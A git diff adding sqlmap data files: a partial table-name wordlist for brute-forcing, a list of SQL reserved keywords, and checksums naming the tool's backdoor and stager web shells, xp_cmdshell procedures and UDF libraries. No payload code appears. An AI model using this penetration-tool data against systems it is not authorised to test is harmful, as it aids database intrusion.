+redirect_links +Schemas +sections +session +stats_agents +templates_menu +template_styles +update_categories +update_sites_extensions +update_sites +updates +usergroups +user_profiles +users +user_usergroup_map +viewlevels +weblinks + +# site:nl + +gebruikers + +# site:cn + +yonghu diff --git a/src/sqlmap-master/data/txt/keywords.txt b/src/sqlmap-master/data/txt/keywords.txt new file mode 100644 index 0000000..50b4262 --- /dev/null +++ b/src/sqlmap-master/data/txt/keywords.txt @@ -0,0 +1,1635 @@ +# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml) + +ABSOLUTE +ACTION +ADD +ALL +ALLOCATE +ALTER +AND +ANY +ARE +AS +ASC +ASSERTION +AT +AUTHORIZATION +AVG +BEGIN +BETWEEN +BIT +BIT_LENGTH +BOTH +BY +CALL +CASCADE +CASCADED +CASE +CAST +CATALOG +CHAR +CHAR_LENGTH +CHARACTER +CHARACTER_LENGTH +CHECK +CLOSE +COALESCE +COLLATE +COLLATION +COLUMN +COMMIT +CONDITION +CONNECT +CONNECTION +CONSTRAINT +CONSTRAINTS +CONTAINS +CONTINUE +CONVERT +CORRESPONDING +COUNT +CREATE +CROSS +CURRENT +CURRENT_DATE +CURRENT_PATH +CURRENT_TIME +CURRENT_TIMESTAMP +CURRENT_USER +CURSOR +DATE +DAY +DEALLOCATE +DEC +DECIMAL +DECLARE +DEFAULT +DEFERRABLE +DEFERRED +DELETE +DESC +DESCRIBE +DESCRIPTOR +DETERMINISTIC +DIAGNOSTICS +DISCONNECT +DISTINCT +DO +DOMAIN +DOUBLE +DROP +ELSE +ELSEIF +END +ESCAPE +EXCEPT +EXCEPTION +EXEC +EXECUTE +EXISTS +EXIT +EXTERNAL +EXTRACT +FALSE +FETCH +FIRST +FLOAT +FOR +FOREIGN +FOUND +FROM +FULL +FUNCTION +GET +GLOBAL +GO +GOTO +GRANT +GROUP +HANDLER +HAVING +HOUR +IDENTITY +IF +IMMEDIATE +IN +INDICATOR +INITIALLY +INNER +INOUT +INPUT +INSENSITIVE +INSERT +INT +INTEGER +INTERSECT +INTERVAL +INTO +IS +ISOLATION +JOIN +KEY +LANGUAGE +LAST +LEADING +LEAVE +LEFT +LEVEL +LIKE +LOCAL +LOOP +LOWER +MATCH +MAX +MIN +MINUTE +MODULE +MONTH +NAMES +NATIONAL +NATURAL +NCHAR +NEXT +NO +NOT +NULL +NULLIF +NUMERIC +OCTET_LENGTH +OF +ON +ONLY +OPEN +OPTION +OR +ORDER +OUT +OUTER +OUTPUT +OVERLAPS +PAD +PARAMETER +PARTIAL +PATH +POSITION +PRECISION +PREPARE +PRESERVE +PRIMARY +PRIOR +PRIVILEGES +PROCEDURE +READ +REAL +REFERENCES +RELATIVE +REPEAT +RESIGNAL +RESTRICT +RETURN +RETURNS +REVOKE +RIGHT +ROLLBACK +ROUTINE +ROWS +SCHEMA +SCROLL +SECOND +SECTION +SELECT +SESSION +SESSION_USER +SET +SIGNAL +SIZE +SMALLINT +SOME +SPACE +SPECIFIC +SQL +SQLCODE +SQLERROR +SQLEXCEPTION +SQLSTATE +SQLWARNING +SUBSTRING +SUM +SYSTEM_USER +TABLE +TEMPORARY +THEN +TIME +TIMESTAMP +TIMEZONE_HOUR +TIMEZONE_MINUTE +TO +TRAILING +TRANSACTION +TRANSLATE +TRANSLATION +TRIM +TRUE +UNDO +UNION +UNIQUE +UNKNOWN +UNTIL +UPDATE +UPPER +USAGE +USER +USING +VALUE +VALUES +VARCHAR +VARYING +VIEW +WHEN +WHENEVER +WHERE +WHILE +WITH +WORK +WRITE +YEAR +ZONE + +# MySQL 5.0 keywords (reference: http://dev.mysql.com/doc/refman/5.0/en/reserved-words.html) + +ADD +ALL +ALTER +ANALYZE +AND +ASASC +ASENSITIVE +BEFORE +BETWEEN +BIGINT +BINARYBLOB +BOTH +BY +CALL +CASCADE +CASECHANGE +CAST +CHAR +CHARACTER +CHECK +COLLATE +COLUMN +CONCAT +CONDITIONCONSTRAINT +CONTINUE +CONVERT +CREATE +CROSS +CURRENT_DATE +CURRENT_TIMECURRENT_TIMESTAMP +CURRENT_USER +CURSOR +DATABASE +DATABASES +DAY_HOUR +DAY_MICROSECONDDAY_MINUTE +DAY_SECOND +DEC +DECIMAL +DECLARE +DEFAULTDELAYED +DELETE +DESC +DESCRIBE +DETERMINISTIC +DISTINCTDISTINCTROW +DIV +DOUBLE +DROP +DUAL +EACH +ELSEELSEIF +ENCLOSED +ESCAPED +EXISTS +EXIT +EXPLAIN +FALSEFETCH +FLOAT +FLOAT4 +FLOAT8 +FOR +FORCE +FOREIGNFROM +FULLTEXT +GRANT +GROUP +HAVING +HIGH_PRIORITYHOUR_MICROSECOND +HOUR_MINUTE +HOUR_SECOND +IF +IFNULL +IGNORE +ININDEX +INFILE +INNER +INOUT +INSENSITIVE +INSERT +INTINT1 +INT2 +INT3 +INT4 +INT8 +INTEGER +INTERVALINTO +IS +ISNULL +ITERATE +JOIN +KEY +KEYS +KILLLEADING +LEAVE +LEFT +LIKE +LIMIT +LINESLOAD +LOCALTIME +LOCALTIMESTAMP +LOCK +LONG +LONGBLOBLONGTEXT +LOOP +LOW_PRIORITY +MATCH +MEDIUMBLOB +MEDIUMINT +MEDIUMTEXTMIDDLEINT +MINUTE_MICROSECOND +MINUTE_SECOND +MOD +MODIFIES +NATURAL +NOTNO_WRITE_TO_BINLOG +NULL +NUMERIC +ON +OPTIMIZE +OPTION +OPTIONALLYOR +ORDER +OUT +OUTER +OUTFILE +PRECISIONPRIMARY +PROCEDURE +PURGE +READ +READS +REALREFERENCES +REGEXP +RELEASE +RENAME +REPEAT +REPLACE +REQUIRERESTRICT +RETURN +REVOKE +RIGHT +RLIKE +SCHEMA +SCHEMASSECOND_MICROSECOND +SELECT +SENSITIVE +SEPARATOR +SET +SHOW +SMALLINTSONAME +SPATIAL +SPECIFIC +SQL +SQLEXCEPTION +SQLSTATESQLWARNING +SQL_BIG_RESULT +SQL_CALC_FOUND_ROWS +SQL_SMALL_RESULT +SSL +STARTINGSTRAIGHT_JOIN +TABLE +TERMINATED +THEN +TINYBLOB +TINYINT +TINYTEXTTO +TRAILING +TRIGGER +TRUE +UNDO +UNION +UNIQUEUNLOCK +UNSIGNED +UPDATE +USAGE +USE +USING +UTC_DATEUTC_TIME +UTC_TIMESTAMP +VALUES +VARBINARY +VARCHAR +VARCHARACTERVARYING +VERSION +WHEN +WHERE +WHILE +WITH +WRITEXOR +YEAR_MONTH +ZEROFILL + +# MySQL 8.0 keywords (reference: https://dev.mysql.com/doc/refman/8.0/en/keywords.html) + +ACCESSIBLE +ACCOUNT +ACTION +ACTIVE +ADD +ADMIN +AFTER +AGAINST +AGGREGATE +ALGORITHM +ALL +ALTER +ALWAYS +ANALYSE +ANALYZE +AND +ANY +ARRAY +AS +ASC +ASCII +ASENSITIVE +AT +ATTRIBUTE +AUTHENTICATION +AUTOEXTEND_SIZE +AUTO_INCREMENT +AVG +AVG_ROW_LENGTH +BACKUP +BEFORE +BEGIN +BETWEEN +BIGINT +BINARY +BINLOG +BIT +BLOB +BLOCK +BOOL +BOOLEAN +BOTH +BTREE +BUCKETS +BULK +BY +BYTE +CACHE +CALL +CASCADE +CASCADED +CASE +CATALOG_NAME +CHAIN +CHALLENGE_RESPONSE +CHANGE +CHANGED +CHANNEL +CHAR +CHARACTER +CHARSET +CHECK +CHECKSUM +CIPHER +CLASS_ORIGIN +CLIENT +CLONE +CLOSE +COALESCE +CODE +COLLATE +COLLATION +COLUMN +COLUMNS +COLUMN_FORMAT +COLUMN_NAME +COMMENT +COMMIT +COMMITTED +COMPACT +COMPLETION +COMPONENT +COMPRESSED +COMPRESSION +CONCURRENT +CONDITION +CONNECTION +CONSISTENT +CONSTRAINT +CONSTRAINT_CATALOG +CONSTRAINT_NAME +CONSTRAINT_SCHEMA +CONTAINS +CONTEXT +CONTINUE +CONVERT +CPU +CREATE +CROSS +CUBE +CUME_DIST +CURRENT +CURRENT_DATE +CURRENT_TIME +CURRENT_TIMESTAMP +CURRENT_USER +CURSOR +CURSOR_NAME +DATA +DATABASE +DATABASES +DATAFILE +DATE +DATETIME +DAY +DAY_HOUR +DAY_MICROSECOND +DAY_MINUTE +DAY_SECOND +DEALLOCATE +DEC +DECIMAL +DECLARE +DEFAULT +DEFAULT_AUTH +DEFINER +DEFINITION +DELAYED +DELAY_KEY_WRITE +DELETE +DENSE_RANK +DESC +DESCRIBE +DESCRIPTION +DES_KEY_FILE +DETERMINISTIC +DIAGNOSTICS +DIRECTORY +DISABLE +DISCARD +DISK +DISTINCT +DISTINCTROW +DIV +DO +DOUBLE +DROP +DUAL +DUMPFILE +DUPLICATE +DYNAMIC +EACH +ELSE +ELSEIF +EMPTY +ENABLE +ENCLOSED +ENCRYPTION +END +ENDS +ENFORCED +ENGINE +ENGINES +ENGINE_ATTRIBUTE +ENUM +ERROR +ERRORS +ESCAPE +ESCAPED +EVENT +EVENTS +EVERY +EXCEPT +EXCHANGE +EXCLUDE +EXECUTE +EXISTS +EXIT +EXPANSION +EXPIRE +EXPLAIN +EXPORT +EXTENDED +EXTENT_SIZE +FACTOR +FAILED_LOGIN_ATTEMPTS +FALSE +FAST +FAULTS +FETCH +FIELDS +FILE +FILE_BLOCK_SIZE +FILTER +FINISH +FIRST +FIRST_VALUE +FIXED +FLOAT +FLOAT4 +FLOAT8 +FLUSH +FOLLOWING +FOLLOWS +FOR +FORCE +FOREIGN +FORMAT +FOUND +FROM +FULL +FULLTEXT +FUNCTION +GENERAL +GENERATE +GENERATED +GEOMCOLLECTION +GEOMETRY +GEOMETRYCOLLECTION +GET +GET_FORMAT +GET_MASTER_PUBLIC_KEY +GET_SOURCE_PUBLIC_KEY +GLOBAL +GRANT +GRANTS +GROUP +GROUPING +GROUPS +GROUP_REPLICATION +GTID_ONLY +HANDLER +HASH +HAVING +HELP +HIGH_PRIORITY +HISTOGRAM +HISTORY +HOST +HOSTS +HOUR +HOUR_MICROSECOND +HOUR_MINUTE +HOUR_SECOND +IDENTIFIED +IF +IGNORE +IGNORE_SERVER_IDS +IMPORT +IN +INACTIVE +INDEX +INDEXES +INFILE +INITIAL +INITIAL_SIZE +INITIATE +INNER +INOUT +INSENSITIVE +INSERT +INSERT_METHOD +INSTALL +INSTANCE +INT +INT1 +INT2 +INT3 +INT4 +INT8 +INTEGER +INTERSECT +INTERVAL +INTO +INVISIBLE +INVOKER +IO +IO_AFTER_GTIDS +IO_BEFORE_GTIDS +IO_THREAD +IPC +IS +ISOLATION +ISSUER +ITERATE +JOIN +JSON +JSON_TABLE +JSON_VALUE +KEY +KEYRING +KEYS +KEY_BLOCK_SIZE +KILL +LAG +LANGUAGE +LAST +LAST_VALUE +LATERAL +LEAD +LEADING +LEAVE +LEAVES +LEFT +LESS +LEVEL +LIKE +LIMIT +LINEAR +LINES +LINESTRING +LIST +LOAD +LOCAL +LOCALTIME +LOCALTIMESTAMP +LOCK +LOCKED +LOCKS +LOGFILE +LOGS +LONG +LONGBLOB +LONGTEXT +LOOP +LOW_PRIORITY +MASTER +MASTER_AUTO_POSITION +MASTER_BIND +MASTER_COMPRESSION_ALGORITHMS +MASTER_CONNECT_RETRY +MASTER_DELAY +MASTER_HEARTBEAT_PERIOD +MASTER_HOST +MASTER_LOG_FILE +MASTER_LOG_POS +MASTER_PASSWORD +MASTER_PORT +MASTER_PUBLIC_KEY_PATH +MASTER_RETRY_COUNT +MASTER_SERVER_ID +MASTER_SSL +MASTER_SSL_CA +MASTER_SSL_CAPATH +MASTER_SSL_CERT +MASTER_SSL_CIPHER +MASTER_SSL_CRL +MASTER_SSL_CRLPATH +MASTER_SSL_KEY +MASTER_SSL_VERIFY_SERVER_CERT +MASTER_TLS_CIPHERSUITES +MASTER_TLS_VERSION +MASTER_USER +MASTER_ZSTD_COMPRESSION_LEVEL +MATCH +MAXVALUE +MAX_CONNECTIONS_PER_HOUR +MAX_QUERIES_PER_HOUR +MAX_ROWS +MAX_SIZE +MAX_UPDATES_PER_HOUR +MAX_USER_CONNECTIONS +MEDIUM +MEDIUMBLOB +MEDIUMINT +MEDIUMTEXT +MEMBER +MEMORY +MERGE +MESSAGE_TEXT +MICROSECOND +MIDDLEINT +MIGRATE +MINUTE +MINUTE_MICROSECOND +MINUTE_SECOND +MIN_ROWS +MOD +MODE +MODIFIES +MODIFY +MONTH +MULTILINESTRING +MULTIPOINT +MULTIPOLYGON +MUTEX +MYSQL_ERRNO +NAME +NAMES +NATIONAL +NATURAL +NCHAR +NDB +NDBCLUSTER +NESTED +NETWORK_NAMESPACE +NEVER +NEW +NEXT +NO +NODEGROUP +NONE +NOT +NOWAIT +NO_WAIT +NO_WRITE_TO_BINLOG +NTH_VALUE +NTILE +NULL +NULLS +NUMBER +NUMERIC +NVARCHAR +OF +OFF +OFFSET +OJ +OLD +ON +ONE +ONLY +OPEN +OPTIMIZE +OPTIMIZER_COSTS +OPTION +OPTIONAL +OPTIONALLY +OPTIONS +OR +ORDER +ORDINALITY +ORGANIZATION +OTHERS +OUT +OUTER +OUTFILE +OVER +OWNER +PACK_KEYS +PAGE +PARSER +PARTIAL +PARTITION +PARTITIONING +PARTITIONS +PASSWORD_LOCK_TIME +PATH +PERCENT_RANK +PERSIST +PERSIST_ONLY +PHASE +PLUGIN +PLUGINS +PLUGIN_DIR +POINT +POLYGON +PORT +PRECEDES +PRECEDING +PRECISION +PREPARE +PRESERVE +PREV +PRIMARY +PRIVILEGES +PRIVILEGE_CHECKS_USER +PROCEDURE +PROCESS +PROCESSLIST +PROFILE +PROFILES +PROXY +PURGE +QUARTER +QUERY +QUICK +RANDOM +RANGE +RANK +READ +READS +READ_ONLY +READ_WRITE +REAL +REBUILD +RECOVER +RECURSIVE +REDOFILE +REDO_BUFFER_SIZE +REDUNDANT +REFERENCE +REFERENCES +REGEXP +REGISTRATION +RELAY +RELAYLOG +RELAY_LOG_FILE +RELAY_LOG_POS +RELAY_THREAD +RELEASE +RELOAD +REMOTE +REMOVE +RENAME +REORGANIZE +REPAIR +REPEAT +REPEATABLE +REPLACE +REPLICA +REPLICAS +REPLICATE_DO_DB +REPLICATE_DO_TABLE +REPLICATE_IGNORE_DB +REPLICATE_IGNORE_TABLE +REPLICATE_REWRITE_DB +REPLICATE_WILD_DO_TABLE +REPLICATE_WILD_IGNORE_TABLE +REPLICATION +REQUIRE +REQUIRE_ROW_FORMAT +RESET +RESIGNAL +RESOURCE +RESPECT +RESTART +RESTORE +RESTRICT +RESUME +RETAIN +RETURN +RETURNED_SQLSTATE +RETURNING +RETURNS +REUSE +REVERSE +REVOKE +RIGHT +RLIKE +ROLE +ROLLBACK +ROLLUP +ROTATE +ROUTINE +ROW +ROWS +ROW_COUNT +ROW_FORMAT +ROW_NUMBER +RTREE +SAVEPOINT +SCHEDULE +SCHEMA +SCHEMAS +SCHEMA_NAME +SECOND +SECONDARY +SECONDARY_ENGINE +SECONDARY_ENGINE_ATTRIBUTE +SECONDARY_LOAD +SECONDARY_UNLOAD +SECOND_MICROSECOND +SECURITY +SELECT +SENSITIVE +SEPARATOR +SERIAL +SERIALIZABLE +SERVER +SESSION +SET +SHARE +SHOW +SHUTDOWN +SIGNAL +SIGNED +SIMPLE +SKIP +SLAVE +SLOW +SMALLINT +SNAPSHOT +SOCKET +SOME +SONAME +SOUNDS +SOURCE +SOURCE_AUTO_POSITION +SOURCE_BIND +SOURCE_COMPRESSION_ALGORITHMS +SOURCE_CONNECT_RETRY +SOURCE_DELAY +SOURCE_HEARTBEAT_PERIOD +SOURCE_HOST +SOURCE_LOG_FILE +SOURCE_LOG_POS +SOURCE_PASSWORD +SOURCE_PORT +SOURCE_PUBLIC_KEY_PATH +SOURCE_RETRY_COUNT +SOURCE_SSL +SOURCE_SSL_CA +SOURCE_SSL_CAPATH +SOURCE_SSL_CERT +SOURCE_SSL_CIPHER +SOURCE_SSL_CRL +SOURCE_SSL_CRLPATH +SOURCE_SSL_KEY +SOURCE_SSL_VERIFY_SERVER_CERT +SOURCE_TLS_CIPHERSUITES +SOURCE_TLS_VERSION +SOURCE_USER +SOURCE_ZSTD_COMPRESSION_LEVEL +SPATIAL +SPECIFIC +SQL +SQLEXCEPTION +SQLSTATE +SQLWARNING +SQL_AFTER_GTIDS +SQL_AFTER_MTS_GAPS +SQL_BEFORE_GTIDS +SQL_BIG_RESULT +SQL_BUFFER_RESULT +SQL_CACHE +SQL_CALC_FOUND_ROWS +SQL_NO_CACHE +SQL_SMALL_RESULT +SQL_THREAD +SQL_TSI_DAY +SQL_TSI_HOUR +SQL_TSI_MINUTE +SQL_TSI_MONTH +SQL_TSI_QUARTER +SQL_TSI_SECOND +SQL_TSI_WEEK +SQL_TSI_YEAR +SRID +SSL +STACKED +START +STARTING +STARTS +STATS_AUTO_RECALC +STATS_PERSISTENT +STATS_SAMPLE_PAGES +STATUS +STOP +STORAGE +STORED +STRAIGHT_JOIN +STREAM +STRING +SUBCLASS_ORIGIN +SUBJECT +SUBPARTITION +SUBPARTITIONS +SUPER +SUSPEND +SWAPS +SWITCHES +SYSTEM +TABLE +TABLES +TABLESPACE +TABLE_CHECKSUM +TABLE_NAME +TEMPORARY +TEMPTABLE +TERMINATED +TEXT +THAN +THEN +THREAD_PRIORITY +TIES +TIME +TIMESTAMP +TIMESTAMPADD +TIMESTAMPDIFF +TINYBLOB +TINYINT +TINYTEXT +TLS +TO +TRAILING +TRANSACTION +TRIGGER +TRIGGERS +TRUE +TRUNCATE +TYPE +TYPES +UNBOUNDED +UNCOMMITTED +UNDEFINED +UNDO +UNDOFILE +UNDO_BUFFER_SIZE +UNICODE +UNINSTALL +UNION +UNIQUE +UNKNOWN +UNLOCK +UNREGISTER +UNSIGNED +UNTIL +UPDATE +UPGRADE +URL +USAGE +USE +USER +USER_RESOURCES +USE_FRM +USING +UTC_DATE +UTC_TIME +UTC_TIMESTAMP +VALIDATION +VALUE +VALUES +VARBINARY +VARCHAR +VARCHARACTER +VARIABLES +VARYING +VCPU +VIEW +VIRTUAL +VISIBLE +WAIT +WARNINGS +WEEK +WEIGHT_STRING +WHEN +WHERE +WHILE +WINDOW +WITH +WITHOUT +WORK +WRAPPER +WRITE +X509 +XA +XID +XML +XOR +YEAR +YEAR_MONTH +ZEROFILL +ZONE + +# PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html) + +ABS +ACOS +ALL +ALLOCATE +ALTER +ANALYSE +ANALYZE +AND +ANY +ARE +ARRAY +ARRAY_AGG +ARRAY_MAX_CARDINALITY +AS +ASC +ASENSITIVE +ASIN +ASYMMETRIC +AT +ATAN +ATOMIC +AUTHORIZATION +AVG +BEGIN +BEGIN_FRAME +BEGIN_PARTITION +BETWEEN +BIGINT +BINARY +BLOB +BOOLEAN +BOTH +BY +CALL +CALLED +CARDINALITY +CASCADED +CASE +CAST +CEIL +CEILING +CHAR +CHARACTER +CHARACTER_LENGTH +CHAR_LENGTH +CHECK +CLASSIFIER +CLOB +CLOSE +COALESCE +COLLATE +COLLATION +COLLECT +COLUMN +COMMIT +CONCURRENTLY +CONDITION +CONNECT +CONSTRAINT +CONTAINS +CONVERT +COPY +CORR +CORRESPONDING +COS +COSH +COUNT +COVAR_POP +COVAR_SAMP +CREATE +CROSS +CUBE +CUME_DIST +CURRENT +CURRENT_CATALOG +CURRENT_DATE +CURRENT_DEFAULT_TRANSFORM_GROUP +CURRENT_PATH +CURRENT_ROLE +CURRENT_ROW +CURRENT_SCHEMA +CURRENT_TIME +CURRENT_TIMESTAMP +CURRENT_TRANSFORM_GROUP_FOR_TYPE +CURRENT_USER +CURSOR +CYCLE +DATALINK +DATE +DAY +DEALLOCATE +DEC +DECFLOAT +DECIMAL +DECLARE +DEFAULT +DEFERRABLE +DEFINE +DELETE +DENSE_RANK +DEREF +DESC +DESCRIBE +DETERMINISTIC +DISCONNECT +DISTINCT +DLNEWCOPY +DLPREVIOUSCOPY +DLURLCOMPLETE +DLURLCOMPLETEONLY +DLURLCOMPLETEWRITE +DLURLPATH +DLURLPATHONLY +DLURLPATHWRITE +DLURLSCHEME +DLURLSERVER +DLVALUE +DO +DOUBLE +DROP +DYNAMIC +EACH +ELEMENT +ELSE +EMPTY +END +END-EXEC +END_FRAME +END_PARTITION +EQUALS +ESCAPE +EVERY +EXCEPT +EXEC +EXECUTE +EXISTS +EXP +EXTERNAL +EXTRACT +FALSE +FETCH +FILTER +FIRST_VALUE +FLOAT +FLOOR +FOR +FOREIGN +FRAME_ROW +FREE +FREEZE +FROM +FULL +FUNCTION +FUSION +GET +GLOBAL +GRANT +GROUP +GROUPING +GROUPS +HAVING +HOLD +HOUR +IDENTITY +ILIKE +IMPORT +IN +INDICATOR +INITIAL +INITIALLY +INNER +INOUT +INSENSITIVE +INSERT +INT +INTEGER +INTERSECT +INTERSECTION +INTERVAL +INTO +IS +ISNULL +JOIN +JSON_ARRAY +JSON_ARRAYAGG +JSON_EXISTS +JSON_OBJECT +JSON_OBJECTAGG +JSON_QUERY +JSON_TABLE +JSON_TABLE_PRIMITIVE +JSON_VALUE +LAG +LANGUAGE +LARGE +LAST_VALUE +LATERAL +LEAD +LEADING +LEFT +LIKE +LIKE_REGEX +LIMIT +LISTAGG +LN +LOCAL +LOCALTIME +LOCALTIMESTAMP +LOG +LOG10 +LOWER +MATCH +MATCHES +MATCH_NUMBER +MATCH_RECOGNIZE +MAX +MEASURES +MEMBER +MERGE +METHOD +MIN +MINUTE +MOD +MODIFIES +MODULE +MONTH +MULTISET +NATIONAL +NATURAL +NCHAR +NCLOB +NEW +NO +NONE +NORMALIZE +NOT +NOTNULL +NTH_VALUE +NTILE +NULL +NULLIF +NUMERIC +OCCURRENCES_REGEX +OCTET_LENGTH +OF +OFFSET +OLD +OMIT +ON +ONE +ONLY +OPEN +OR +ORDER +OUT +OUTER +OVER +OVERLAPS +OVERLAY +PARAMETER +PARTITION +PATTERN +PER +PERCENT +PERCENTILE_CONT +PERCENTILE_DISC +PERCENT_RANK +PERIOD +PERMUTE +PLACING +PORTION +POSITION +POSITION_REGEX +POWER +PRECEDES +PRECISION +PREPARE +PRIMARY +PROCEDURE +PTF +RANGE +RANK +READS +REAL +RECURSIVE +REF +REFERENCES +REFERENCING +REGR_AVGX +REGR_AVGY +REGR_COUNT +REGR_INTERCEPT +REGR_R2 +REGR_SLOPE +REGR_SXX +REGR_SXY +REGR_SYY +RELEASE +RESULT +RETURN +RETURNING +RETURNS +REVOKE +RIGHT +ROLLBACK +ROLLUP +ROW +ROWS +ROW_NUMBER +RUNNING +SAVEPOINT +SCOPE +SCROLL +SEARCH +SECOND +SEEK +SELECT +SENSITIVE +SESSION_USER +SET +SHOW +SIMILAR +SIN +SINH +SKIP +SMALLINT +SOME +SPECIFIC +SPECIFICTYPE +SQL +SQLEXCEPTION +SQLSTATE +SQLWARNING +SQRT +START +STATIC +STDDEV_POP +STDDEV_SAMP +SUBMULTISET +SUBSET +SUBSTRING +SUBSTRING_REGEX +SUCCEEDS +SUM +SYMMETRIC +SYSTEM +SYSTEM_TIME +SYSTEM_USER +TABLE +TABLESAMPLE +TAN +TANH +THEN +TIME +TIMESTAMP +TIMEZONE_HOUR +TIMEZONE_MINUTE +TO +TRAILING +TRANSLATE +TRANSLATE_REGEX +TRANSLATION +TREAT +TRIGGER +TRIM +TRIM_ARRAY +TRUE +TRUNCATE +UESCAPE +UNION +UNIQUE +UNKNOWN +UNMATCHED +UNNEST +UPDATE +UPPER +USER +USING +VALUE +VALUES +VALUE_OF +VARBINARY +VARCHAR +VARIADIC +VARYING +VAR_POP +VAR_SAMP +VERBOSE +VERSIONING +WHEN +WHENEVER +WHERE +WIDTH_BUCKET +WINDOW +WITH +WITHIN +WITHOUT +XML +XMLAGG +XMLATTRIBUTES +XMLBINARY +XMLCAST +XMLCOMMENT +XMLCONCAT +XMLDOCUMENT +XMLELEMENT +XMLEXISTS +XMLFOREST +XMLITERATE +XMLNAMESPACES +XMLPARSE +XMLPI +XMLQUERY +XMLSERIALIZE +XMLTABLE +XMLTEXT +XMLVALIDATE +YEAR + +# Misc + +ORD +MID diff --git a/src/sqlmap-master/data/txt/sha256sums.txt b/src/sqlmap-master/data/txt/sha256sums.txt new file mode 100644 index 0000000..92f345f --- /dev/null +++ b/src/sqlmap-master/data/txt/sha256sums.txt @@ -0,0 +1,630 @@ +39a8a35d730f49daf657fa58903a9cd309813b275df29a86439297a10a15261a data/html/index.html +e70317eb90f7d649e4320e59b2791b8eb5810c8cad8bc0c49d917eac966b0f18 data/procs/mssqlserver/activate_sp_oacreate.sql +6a2de9f090c06bd77824e15ac01d2dc11637290cf9a5d60c00bf5f42ac6f7120 data/procs/mssqlserver/configure_openrowset.sql +798f74471b19be1e6b1688846631b2e397c1a923ad8eca923c1ac93fc94739ad data/procs/mssqlserver/configure_xp_cmdshell.sql +5dfaeac6e7ed4c3b56fc75b3c3a594b8458effa4856c0237e1b48405c309f421 data/procs/mssqlserver/create_new_xp_cmdshell.sql +3c8944fbd4d77b530af2c72cbabeb78ebfb90f01055a794eede00b7974a115d0 data/procs/mssqlserver/disable_xp_cmdshell_2000.sql +afb169095dc36176ffdd4efab9e6bb9ed905874469aac81e0ba265bc6652caa4 data/procs/mssqlserver/dns_request.sql +657d56f764c84092ff4bd10b8fcbde95c13780071b715df0af1bc92b7dd284f2 data/procs/mssqlserver/enable_xp_cmdshell_2000.sql +1b7d521faca0f69a62c39e0e4267e18a66f8313b22b760617098b7f697a5c81d data/procs/mssqlserver/run_statement_as_user.sql +9b8b6e430c705866c738dd3544b032b0099a917d91c85d2b25a8a5610c92bcdf data/procs/mysql/dns_request.sql +02b7ef3e56d8346cc4e06baa85b608b0650a8c7e3b52705781a691741fc41bfb data/procs/mysql/write_file_limit.sql +02be5ce785214cb9cac8f0eab10128d6f39f5f5de990dea8819774986d0a7900 data/procs/oracle/dns_request.sql +606fe26228598128c88bda035986281f117879ac7ff5833d88e293c156adc117 data/procs/oracle/read_file_export_extension.sql +4d448d4b7d8bc60ab2eeedfe16f7aa70c60d73aa6820d647815d02a65b1af9eb data/procs/postgresql/dns_request.sql +7e3e28eac7f9ef0dea0a6a4cdb1ce9c41f28dd2ee0127008adbfa088d40ef137 data/procs/README.txt +3fa42f7428a91d94e792ad8d3cb76109cfe2632d918ae046e32be5a2b51ad3d8 data/shell/backdoors/backdoor.asp_ +7943c1d1e8c037f5466f90ed91cc88441beb0efab83ef5ae98473d2aee770b65 data/shell/backdoors/backdoor.aspx_ +9d9d0bdd4145df96058977a39be924f0facdba9efa7b585848101dafbcb7b02e data/shell/backdoors/backdoor.jsp_ +8a7a73a4c841e92ece79942e03a18df046f90ba43e6af6c4f8fbb77f437bce07 data/shell/backdoors/backdoor.php_ +a08e09c1020eae40b71650c9b0ac3c3842166db639fdcfc149310fc8cf536f64 data/shell/README.txt +67ce7eec132297594f7fd31f93f8d044df3d745c01c70c5afc320848eb4aa149 data/shell/stagers/stager.asp_ +099eb0f9ed71946eb55bd1d4afa1f1f7ef9f39cc41af4897f3d5139524bd2fc2 data/shell/stagers/stager.aspx_ +f2648a0cb4d5922d58b8aa6600f786b32324b9ac91e3a57e4ff212e901ffe151 data/shell/stagers/stager.jsp_ +84b431647a2c13e72b2c9c9242a578349d1b8eef596166128e08f1056d7e4ac8 data/shell/stagers/stager.php_ +31676dcadde4c2eef314ef90e0661a57d2d43cb52a39ef991af43fcb6fa9af22 data/txt/common-columns.txt +bb88fcfc8eae17865c4c25c9031d4488ef38cc43ab241c7361ae2a5df24fd0bb data/txt/common-files.txt +e456db93a536bc3e7c1fbb6f15fbac36d6d40810c8a754b10401e0dab1ce5839 data/txt/common-outputs.txt +1c5095ba246934be2a7990bf11c06703f48ebba53f0dba18107fcf44e11a5cea data/txt/common-tables.txt +4ee746dcab2e3b258aa8ff2b51b40bef2e8f7fc12c430b98d36c60880a809f03 data/txt/keywords.txt +c5ce8ea43c32bc72255fa44d752775f8a2b2cf78541cbeaa3749d47301eb7fc6 data/txt/smalldict.txt +895f9636ea73152d9545be1b7acaf16e0bc8695c9b46e779ab30b226d21a1221 data/txt/user-agents.txt +9c2d6a0e96176447ab8758f8de96e6a681aa0c074cd0eca497712246d8f410c6 data/txt/wordlist.tx_ +849c61612bd0d773971254df2cc76cc18b3d2db4051a8f508643278a166df44e data/udf/mysql/linux/32/lib_mysqludf_sys.so_ +20b5a80b8044da1a0d5c5343c6cbc5b71947c5464e088af466a3fcd89c2881ef data/udf/mysql/linux/64/lib_mysqludf_sys.so_ +8e6ae0e3d67e47261df064aa1536f99e56d4f001cc7f800c3d93b091c3c73115 data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ +51d055d00863655e43e683377257953a19728a0ae9a3fe406768289474eb4104 data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ +9340f3d10dcca0d72e707f22cf1c4c6581b979c23d6f55a417ee41d9091bb9d1 data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ +dc1199c029dff238e971fd3250916eb48503daa259464c24f22cd2cd51f5ccd8 data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ +0b6a7e34fbbd27adaa8beda36ce20e93fd65b8e3ce93bf44703c514ebdd1cef0 data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ +922fb68413b05031e9237414cf50a04e0e43f0d1c7ef44cfb77305eea0b6f2fe data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ +029ffa3b30a4c6cb10f5271b72c2a6b8967cdab0d23c8e4b0e5e75e2a5c734f2 data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ 